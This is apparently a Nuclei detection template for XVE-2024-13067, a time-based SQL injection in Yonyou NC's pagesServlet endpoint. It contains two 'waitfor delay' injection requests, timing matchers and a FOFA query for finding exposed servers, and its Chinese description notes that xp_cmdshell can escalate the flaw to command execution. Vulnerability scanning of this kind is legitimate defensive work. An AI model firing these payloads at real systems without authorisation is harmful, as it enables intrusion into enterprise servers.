id: yongyouNC-pagesServlet-sql-injection

info:
  name: 用友NC pagesServlet SQL注入致RCE漏洞复现(XVE-2024-13067)
  author: Superhero
  severity: high
  description: |-
    fofa: app="用友-UFIDA-NC"
    用友NC /portal/pt/servlet/pagesServlet/doPost接口存在SQL注入漏洞，攻击者通过利用SQL注入漏洞配合数据库xp_ cmdshel可以执行任意命令，从而控制服务器。经过分析与研判，该漏洞利用难度低，建议尽快修复。
  reference:
    - https://blog.csdn.net/m0_60571842/article/details/139579873
  tags: sql injection

http:
  - raw:
      - |
        GET /portal/pt/servlet/pagesServlet/doPost?pageId=login&pk_group=1'waitfor+delay+'0:0:5'-- HTTP/1.1 
        Host: {{Hostname}}

      - |
        GET /portal/pt/servlet/pagesServlet/doPost?pageId=login&pk_group=1'waitfor+delay+'0:0:9'-- HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
            - 'duration_1>=5 && duration_1<=6'  
            - 'duration_2>=9 && duration_2<=10'  
        condition: and
      - type: status
        status: 
          - 200





